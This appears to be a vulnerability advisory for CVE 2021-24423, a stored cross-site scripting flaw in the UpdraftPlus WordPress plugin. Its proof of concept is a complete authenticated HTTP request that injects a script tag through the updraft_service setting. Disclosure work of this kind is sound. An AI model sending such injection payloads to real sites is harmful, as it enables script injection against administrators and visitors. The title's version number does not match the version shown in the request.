UpdraftPlus < 1.6.59 – Admin+ Stored Cross-Site Scripting | CVE 2021-24423

Description

The plugin does not sanitise its updraft_service settings, allowing high privilege users to set malicious JavaScript payload in it and leading to a Stored Cross-Site Scripting issue

Proof of Concept

PoC | Authenticated Persistent XSS | Settings > Choose your remote storage:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5767

action=updraft_savesettings&subaction=savesettings&nonce=c7120743dc&settings=option_page%3Dupdraft-options-group%26_wpnonce%3D01063ba263%26_wp_http_referer%3D%252Fwp-admin%252Foptions-general.php%253Fpage%253Dupdraftplus%26updraft_interval%3Dmonthly%26updraftplus_starttime_files%3D%26updraft_retain%3D1%26updraft_interval_database%3Dmanual%26updraftplus_starttime_db%3D%26updraft_retain_db%3D1%26updraft_service%255B%255D%3Demail"><script>alert();</script>%26updraft_dropbox%255Bversion%255D%3D1%26updraft_dropbox%255Bsettings%255D%255Bs-2a7caf3a74d504515081dfd0b531ccd2%255D%255Bdummy-nosave%255D%3D0%26updraft_s3%255Bversion%255D%3D1%26updraft_s3%255Bsettings%255D%255Bs-bc2287fa5dd4cdb455f4809ac57a09d7%255D%255Baccesskey%255D%3D%26updraft_s3%255Bsettings%255D%255Bs-bc2287fa5dd4cdb455f4809ac57a09d7%255D%255Bsecretkey%255D%3D%26updraft_s3%255Bsettings%255D%255Bs-bc2287fa5dd4cdb455f4809ac57a09d7%255D%255Bpath%255D%3D%26updraft_cloudfiles%255Bversion%255D%3D1%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bauthurl%255D%3Dhttps%253A%252F%252Fauth.api.rackspacecloud.com%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bregion%255D%3DDFW%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Buser%255D%3D%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bapikey%255D%3D%26updraft_cloudfiles%255Bsettings%255D%255Bs-fbfe0b88e8c79c38895b4fe6b101905b%255D%255Bpath%255D%3D%26updraft_googledrive%255Bversion%255D%3D1%26updraft_googledrive%255Bsettings%255D%255Bs-ff2d80b9376e659dde6c8f7dbcf86b9c%255D%255Bfolder%255D%3DUpdraftPlus%26updraft_onedrive%255Bversion%255D%3D1%26updraft_ftp%255Bversion%255D%3D1%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bhost%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Buser%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bpass%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bpath%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-6bde0c4ea403a7d64f87f61bb42efcf4%255D%255Bpassive%255D%3D1%26updraft_azure%255Bversion%255D%3D1%26updraft_sftp%255Bversion%255D%3D1%26updraft_googlecloud%255Bversion%255D%3D1%26updraft_backblaze%255Bversion%255D%3D1%26updraft_webdav%255Bversion%255D%3D1%26updraft_s3generic%255Bversion%255D%3D1%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Baccesskey%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bsecretkey%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bpath%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bendpoint%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-03ec850a0106bdc94704ed400202f6e7%255D%255Bbucket_access_style%255D%3Dpath_style%26updraft_openstack%255Bversion%255D%3D1%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bauthurl%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Btenant%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bregion%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Buser%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bpassword%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-966c380d736aabf0429dc160d1c79a0a%255D%255Bpath%255D%3D%26updraft_dreamobjects%255Bversion%255D%3D1%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Baccesskey%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Bsecretkey%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Bpath%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-edf60db5e5c21a0d5abb16b24b9ea0e9%255D%255Bendpoint%255D%3Dobjects-us-east-1.dream.io%26updraft_include_plugins%3D1%26updraft_include_themes%3D1%26updraft_include_uploads%3D1%26updraft_include_uploads_exclude%3Dbackup*%252C*backups%252Cbackwpup*%252Cwp-clone%252Csnapshots%26updraft_include_uploads_exclude_entity%255B%255D%3Dbackup*%26updraft_include_uploads_exclude_entity%255B%255D%3D*backups%26updraft_include_uploads_exclude_entity%255B%255D%3Dbackwpup*%26updraft_include_uploads_exclude_entity%255B%255D%3Dwp-clone%26updraft_include_uploads_exclude_entity%255B%255D%3Dsnapshots%26updraft_include_others%3D1%26updraft_include_others_exclude%3Dupdraft%252Cbackup*%252C*backups%252Cmysql.sql%252Cdebug.log%26updraft_include_others_exclude_entity%255B%255D%3Dupdraft%26updraft_include_others_exclude_entity%255B%255D%3Dbackup*%26updraft_include_others_exclude_entity%255B%255D%3D*backups%26updraft_include_others_exclude_entity%255B%255D%3Dmysql.sql%26updraft_include_others_exclude_entity%255B%255D%3Ddebug.log%26updraft_email%3Dvladm0ze%2540gmail.com%26updraft_debug_mode%3D1%26updraft_split_every%3D40013%26updraft_delete_local%3D1%26updraft_dir%3D40013%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_ssl_useservercerts%3D0%26updraft_ssl_disableverify%3D0%26updraft_ssl_nossl%3D0%26updraft_auto_updates%3D0&updraftplus_version=1.16.56